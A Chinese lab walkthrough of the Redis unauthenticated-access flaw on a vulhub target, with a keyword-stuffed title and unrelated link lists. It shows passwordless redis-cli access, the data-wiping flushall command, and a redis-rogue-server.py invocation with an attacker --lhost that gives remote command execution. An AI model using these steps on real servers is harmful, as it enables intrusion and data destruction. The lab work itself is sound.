当前位置: 首页 > wzjs >正文

成都专业网站建设优化团队semseo是什么意思

成都专业网站建设优化团队,semseo是什么意思,网站权重如何做,关键词查询爱站网一、漏洞信息 redis默认情况下会绑定在本地6379端口,如果没有进行采用相关的策略,就会将redis服务暴露到公网上,如果再没有设置密码认证(一般为空)的情况下,会导致任意用户可以访问到目标服务器的情况下未授权访问redis以及读取r…

一、漏洞信息

redis默认情况下会绑定在本地6379端口,如果没有进行采用相关的策略,就会将redis服务暴露到公网上,如果再没有设置密码认证(一般为空)的情况下,会导致任意用户可以访问到目标服务器的情况下未授权访问redis以及读取redis的数据。

二、漏洞利用条件

1.redis绑定在6379端口且没有添加防火墙规则避免其他非信任ip访问等安全策略
2.没有设置密码认证,可以免密码远程登陆redis服务

三、环境搭建

这里使用vulhub里面的redis/4-unacc靶场

cd /vulhub/redis/4-unacc        #进入靶场所在目录
docker-compose up -d        #一键启动容器环境
docker ps        #查看是否开启容器

四、漏洞复现

1.在kali上安装redis程序进行服务的链接

apt-get install redis        #安装redis服务
redis常用命令:
1.查看信息:info
2.删除所有数据库内容:flushall
3.刷新数据库:flushdb
4.保存:save
5.设置路径等配置:config set dir dirpath
如果提示无法安装,可能需要更新以下kali源,使用以下命令:
apt-get update

2.使用kali对redis服务进行远程链接

redis-cli -h ip -p 6379        #通过远程链接至redis服务

如果可以直接执行命令且不需要认证说明存在未授权访问漏洞

3.使用脚本工具获取目标的命令执行环境

python3 redis-rogue-server.py --rhost ip --lhost ip

成功获取到目标主机的命令执行环境

http://www.dtcms.com/wzjs/538824.html

相关文章:

  • 外贸一般在哪个网站做的做婚纱影楼网站的价格
  • 杭州建电商网站多少钱企业网站建设的类型有哪些
  • 沈阳做网站哪家公司好织梦cms官网模板
  • 建个私人网站怎么做文具电子商务网站开发内容
  • 模板 网站 教程wordpress做商城网站
  • 企业网站免费推广方案新服务器做网站如何配置
  • 微信网站建设哪家好创意网名大全
  • 个人网站开发的背景wordpress注册邮件内容
  • 响应式网站建设精英做代练去什么网站安全
  • 网站外链发布平台手机图片制作软件免费
  • 做网站的教学视频做360手机网站优化
  • 智能建站是什么开外贸公司的流程及费用
  • 滴滴网站建设流程wap 网站 手机
  • 成立中英文网站建设工作领导小组wordpress 商品模板下载
  • 购买网站空间自己怎样建立网站wordpress插件汉化下载地址
  • 深圳手机商城网站设计百度电话号码查询
  • word用来做网站的长沙公司网络营销推广
  • 北京智联招聘官方网站做家政网站开发外包报价
  • 常德网站建设字答科技律师咨询免费24小时在线
  • 建设网站 注册与登陆网站推广方法有几种
  • 网站站点风格餐饮网站建设目标
  • 网站开发+.net+开源做网站推广送什么
  • 网站推广的目的是什archigo建筑网站
  • 中海建路桥建设有限公司网站建设通网站首页
  • 做网站文案策划步骤佛山广告设计公司排名
  • 网站设置专栏有什么好处网站搭建策略与方法
  • 路由器上建网站腾讯服务器做网站
  • 阿里云做网站要几天商企在线营销型网站
  • 陕西正天建设有限公司网站做网站头视频
  • 最便宜的网站空间网站建设方案设计